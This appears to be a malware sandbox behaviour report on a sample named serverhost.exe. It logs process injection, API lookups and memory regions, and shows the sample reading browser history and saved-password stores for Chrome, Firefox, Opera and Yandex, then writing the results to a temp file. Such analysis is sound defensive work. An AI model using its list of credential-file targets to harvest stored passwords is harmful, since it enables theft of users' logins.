Get Address c:\windows\system32\kernel32.dll function = IsValidLocaleName, address_out = 0x7661f71b True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = LCMapStringEx, address_out = 0x7661f72b True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetTickCount64, address_out = 0x765ceb4e True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
System (3)
+
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2017-10-12 10:39:22 (UTC) True 1
Fn
Get Time type = Ticks, time = 119293 True 2
Fn
Environment (1)
+
Operation Additional Information Success Count Logfile
Get Environment String True 1
Fn
Data
Process #14: serverhost.exe
(Host: 1026, Network: 0)
+
Information Value
ID #14
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:01:25, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:00
OS Process Information
+
Information Value
PID 0xc64
Parent PID 0xc18 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x C68
0x C80
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
locale.nls 0x00040000 0x000a6fff Memory Mapped File Readable False False False
pagefile_0x00000000000b0000 0x000b0000 0x00177fff Pagefile Backed Memory Readable True False False
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False
private_0x0000000000190000 0x00190000 0x0028ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000290000 0x00290000 0x00390fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003a0000 0x003a0000 0x003a0fff Pagefile Backed Memory Readable, Writable True False False
tzres.dll 0x003b0000 0x003b0fff Memory Mapped File Readable False False False
private_0x00000000003b0000 0x003b0000 0x003bffff Private Memory Readable, Writable True False False
pagefile_0x00000000003b0000 0x003b0000 0x003b7fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000003c0000 0x003c0000 0x003c6fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003d0000 0x003d0000 0x003d1fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000003e0000 0x003e0000 0x003effff Private Memory Readable, Writable True False False
pagefile_0x00000000003f0000 0x003f0000 0x003f7fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000400000 0x00400000 0x0045afff Private Memory Readable, Writable, Executable True False False
rsaenh.dll 0x00460000 0x0049bfff Memory Mapped File Readable False False False
private_0x0000000000520000 0x00520000 0x0052ffff Private Memory Readable, Writable True False False
private_0x0000000000570000 0x00570000 0x0066ffff Private Memory Readable, Writable True False False
private_0x0000000000670000 0x00670000 0x0076ffff Private Memory Readable, Writable True False False
sortdefault.nls 0x00770000 0x00a3efff Memory Mapped File Readable False False False
private_0x0000000000a60000 0x00a60000 0x00b5ffff Private Memory Readable, Writable True False False
private_0x0000000000b60000 0x00b60000 0x00c3ffff Private Memory Readable, Writable True False False
serverhost.exemh.exe 0x00c40000 0x00c5afff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c60000 0x00c60000 0x0185ffff Pagefile Backed Memory Readable True False False
private_0x0000000001860000 0x01860000 0x01960fff Private Memory Readable, Writable True False False
nss3.dll 0x01860000 0x01a11fff Memory Mapped File Readable False False False
nss3.dll 0x01860000 0x01a11fff Memory Mapped File Readable False False False
private_0x0000000001860000 0x01860000 0x0197ffff Private Memory Readable, Writable True False False
private_0x0000000001860000 0x01860000 0x0195ffff Private Memory Readable, Writable True False False
private_0x0000000001970000 0x01970000 0x0197ffff Private Memory Readable, Writable True False False
private_0x0000000001980000 0x01980000 0x01a7ffff Private Memory Readable, Writable True False False
private_0x0000000001a00000 0x01a00000 0x01afffff Private Memory Readable, Writable True False False
pagefile_0x0000000001b00000 0x01b00000 0x01ef2fff Pagefile Backed Memory Readable True False False
nss3.dll 0x63270000 0x63424fff Memory Mapped File Readable, Writable, Executable False False False
msvcr100.dll 0x6d490000 0x6d54dfff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x6e620000 0x6e651fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
msvcp100.dll 0x6f270000 0x6f2d8fff Memory Mapped File Readable, Writable, Executable False False False
mozglue.dll 0x6f2e0000 0x6f301fff Memory Mapped File Readable, Writable, Executable False False False
wsock32.dll 0x6f310000 0x6f316fff Memory Mapped File Readable, Writable, Executable False False False
freebl3.dll 0x6f3d0000 0x6f41efff Memory Mapped File Readable, Writable, Executable False False False
freebl3.dll 0x6f3e0000 0x6f42efff Memory Mapped File Readable, Writable, Executable False False False
softokn3.dll 0x6f420000 0x6f446fff Memory Mapped File Readable, Writable, Executable False False False
nssdbm3.dll 0x6f430000 0x6f446fff Memory Mapped File Readable, Writable, Executable False False False
softokn3.dll 0x6f450000 0x6f476fff Memory Mapped File Readable, Writable, Executable False False False
nssdbm3.dll 0x6f460000 0x6f476fff Memory Mapped File Readable, Writable, Executable False False False
vaultcli.dll 0x6f4d0000 0x6f4dbfff Memory Mapped File Readable, Writable, Executable False False False
pstorec.dll 0x71ec0000 0x71eccfff Memory Mapped File Readable, Writable, Executable False False False
atl.dll 0x741c0000 0x741d3fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x74940000 0x74948fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74c20000 0x74c5afff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74e70000 0x74e85fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75460000 0x7546bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x755b0000 0x756ccfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
comdlg32.dll 0x76670000 0x766eafff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x76960000 0x76994fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76c60000 0x76e5afff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76f00000 0x77035fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x77040000 0x77134fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x773e0000 0x773e5fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x773f0000 0x773f4fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd4000 0x7ffd4000 0x7ffd4fff Private Memory Readable, Writable True False False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False
Injection Information
+
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc24 address = 0x400000, size = 372736 True 1
Fn
Data
Modify Memory #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc24 address = 0x7ffd4008, size = 4 True 1
Fn
Data
Modify Control Flow #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc24 os_tid = 0xc68, address = 0x0 True 1
Fn
Host Behavior
File (795)
+
Operation Filename Additional Information Success Count Logfile
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data desired_access = GENERIC_READ True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data desired_access = GENERIC_READ True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\ProgramData\C571.tmp desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost_lng.ini type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat type = size True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat type = size True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat type = size True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat type = size True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\history.dat type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite type = time True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini type = file_attributes True 1
Fn
Get Info C:\Program Files\Mozilla Firefox\nss3.dll type = file_attributes True 3
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\logins.json type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\signons.sqlite type = file_attributes True 1
Fn
Get Info C:\Program Files\Mozilla Firefox\sqlite3.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\Mozilla Firefox\mozsqlite3.dll type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini type = file_attributes False 1
Fn
Get Info C:\Program Files\Sea Monkey\nss3.dll type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data type = file_attributes True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal type = file_attributes True 2
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data type = size, size_out = 0 True 5
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data-wal type = file_attributes False 2
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data type = file_attributes True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal type = file_attributes True 2
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data type = size, size_out = 0 True 5
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal type = file_attributes False 2
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\pnacl\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\pnacl\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwiftShader\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwiftShader\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Apple Computer\Preferences\keychain.plist type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera\Opera\wand.dat type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera\Opera7\profile\wand.dat type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera Software\Opera Stable\Login Data type = file_attributes False 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 8, size_out = 8 True 124
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 256, size_out = 256 True 114
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 384, size_out = 384 True 10
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat size = 8, size_out = 8 True 124
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat size = 256, size_out = 256 True 114
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat size = 384, size_out = 384 True 10
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 8, size_out = 8 True 80
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 256, size_out = 256 True 12
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 384, size_out = 384 True 2
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat size = 8, size_out = 8 True 92
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat size = 256, size_out = 256 True 4
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data size = 100, size_out = 100 True 1
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data size = 2048, size_out = 2048 True 4
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data size = 16, size_out = 16 True 1
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data size = 100, size_out = 100 True 1
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data size = 2048, size_out = 2048 True 2
Fn
Data
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data size = 16, size_out = 16 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 3 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 1 True 8
Fn
Data
Write C:\ProgramData\C571.tmp size = 11 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 9 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 8 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 17 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 15 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 14 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 12 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 13 True 1
Fn
Data
Write C:\ProgramData\C571.tmp size = 2 True 1
Fn
Data
Registry (29)
+
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\bin False 3
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla False 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla False 1
Fn
Process (54)
+
Operation Process Additional Information Success Count Logfile
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\services.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
